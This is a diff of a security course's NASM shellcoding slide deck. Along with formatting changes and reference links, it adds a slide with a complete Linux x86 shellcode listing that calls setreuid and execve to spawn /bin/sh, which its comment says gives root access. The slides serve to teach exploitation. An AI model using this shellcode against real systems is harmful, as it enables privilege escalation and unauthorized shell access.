--- a/COSC402_545_Software_OS_Security/MyPPTs/3_shellcoding/NASM.pptx
+++ b/COSC402_545_Software_OS_Security/MyPPTs/3_shellcoding/NASM.pptx
@@ -24,7 +24,8 @@
     <p:sldId id="261" r:id="rId18"/>
     <p:sldId id="265" r:id="rId19"/>
     <p:sldId id="274" r:id="rId20"/>
-    <p:sldId id="275" r:id="rId21"/>
+    <p:sldId id="276" r:id="rId21"/>
+    <p:sldId id="275" r:id="rId22"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -307,7 +308,7 @@
           <a:p>
             <a:fld id="{D7779A1B-E47E-4D69-B328-C59601EA5CE5}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>1/24/2016</a:t>
+              <a:t>1/28/2016</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -477,7 +478,7 @@
           <a:p>
             <a:fld id="{D7779A1B-E47E-4D69-B328-C59601EA5CE5}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>1/24/2016</a:t>
+              <a:t>1/28/2016</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -657,7 +658,7 @@
           <a:p>
             <a:fld id="{D7779A1B-E47E-4D69-B328-C59601EA5CE5}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>1/24/2016</a:t>
+              <a:t>1/28/2016</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -827,7 +828,7 @@
           <a:p>
             <a:fld id="{D7779A1B-E47E-4D69-B328-C59601EA5CE5}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>1/24/2016</a:t>
+              <a:t>1/28/2016</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1073,7 +1074,7 @@
           <a:p>
             <a:fld id="{D7779A1B-E47E-4D69-B328-C59601EA5CE5}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>1/24/2016</a:t>
+              <a:t>1/28/2016</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1361,7 +1362,7 @@
           <a:p>
             <a:fld id="{D7779A1B-E47E-4D69-B328-C59601EA5CE5}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>1/24/2016</a:t>
+              <a:t>1/28/2016</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1783,7 +1784,7 @@
           <a:p>
             <a:fld id="{D7779A1B-E47E-4D69-B328-C59601EA5CE5}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>1/24/2016</a:t>
+              <a:t>1/28/2016</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1901,7 +1902,7 @@
           <a:p>
             <a:fld id="{D7779A1B-E47E-4D69-B328-C59601EA5CE5}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>1/24/2016</a:t>
+              <a:t>1/28/2016</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1996,7 +1997,7 @@
           <a:p>
             <a:fld id="{D7779A1B-E47E-4D69-B328-C59601EA5CE5}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>1/24/2016</a:t>
+              <a:t>1/28/2016</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2273,7 +2274,7 @@
           <a:p>
             <a:fld id="{D7779A1B-E47E-4D69-B328-C59601EA5CE5}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>1/24/2016</a:t>
+              <a:t>1/28/2016</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2526,7 +2527,7 @@
           <a:p>
             <a:fld id="{D7779A1B-E47E-4D69-B328-C59601EA5CE5}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>1/24/2016</a:t>
+              <a:t>1/28/2016</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2739,7 +2740,7 @@
           <a:p>
             <a:fld id="{D7779A1B-E47E-4D69-B328-C59601EA5CE5}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>1/24/2016</a:t>
+              <a:t>1/28/2016</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -6742,7 +6743,9 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
@@ -6773,9 +6776,37 @@
           </a:p>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
               <a:t>http://www.nasm.us/doc/nasmdoc2.html</a:t>
             </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId6"/>
+              </a:rPr>
+              <a:t>http://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:hlinkClick r:id="rId6"/>
+              </a:rPr>
+              <a:t>www.vividmachines.com/shellcode/shellcode.html</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US"/>
+              <a:t>http://www.tenouk.com/Bufferoverflowc/Bufferoverflow5.html</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
@@ -6796,6 +6827,681 @@
 </file>
 
 <file path=ppt/slides/slide20.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Rectangle 4"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2260600" y="63500"/>
+            <a:ext cx="4572000" cy="6524863"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>;By Steve Hanna</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>;shanna@uiuc.edu</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>;http://www.vividmachines.com/</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>;Linux Shellcode</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>;shellex.asm shellcode example</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>;this shellcode fires up a shell with root access</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>[SECTION .text]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>global _start</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>_start:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>xor</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>eax</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>eax</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FF0000"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>mov</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> al, 70              ;</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>setreuid</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> is </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>syscall</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> 70</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>xor</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>ebx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>ebx</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FF0000"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>xor</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>ecx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>ecx</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FF0000"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>int</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> 0x80</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>jmp</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t> short ender</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        starter:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        pop </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>ebx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>                 ;get the address of the string</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>xor</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>eax</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>eax</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>mov</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t> [ebx+7 ], al        ;put a NULL where the N is in the string</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>mov</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t> [ebx+8 ], </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>ebx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>       ;put the address of the string to where the</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>                                ;AAAA is</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>mov</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t> [ebx+12], </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>eax</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>       ;put 4 null bytes into where the BBBB is</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>mov</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t> al, 11              ;</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>execve</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t> is </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>syscall</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t> 11</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        lea </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>ecx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>, [ebx+8]        ;load the address of where the AAAA was</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        lea </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>edx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>, [ebx+12]       ;load the address of the NULLS</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>int</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t> 0x80                ;call the kernel, WE HAVE A SHELL!</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        ender:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        call starter</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>db</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t> '/bin/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+              <a:t>shNAAAABBBB</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1100" dirty="0"/>
+              <a:t>'</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="TextBox 5"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5580112" y="2029490"/>
+            <a:ext cx="3456384" cy="923330"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>We can remove it, however, we must use command </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="7030A0"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>chmod</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="7030A0"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> 4755 + </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="7030A0"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>shellex</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="7030A0"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="995851130"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide21.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
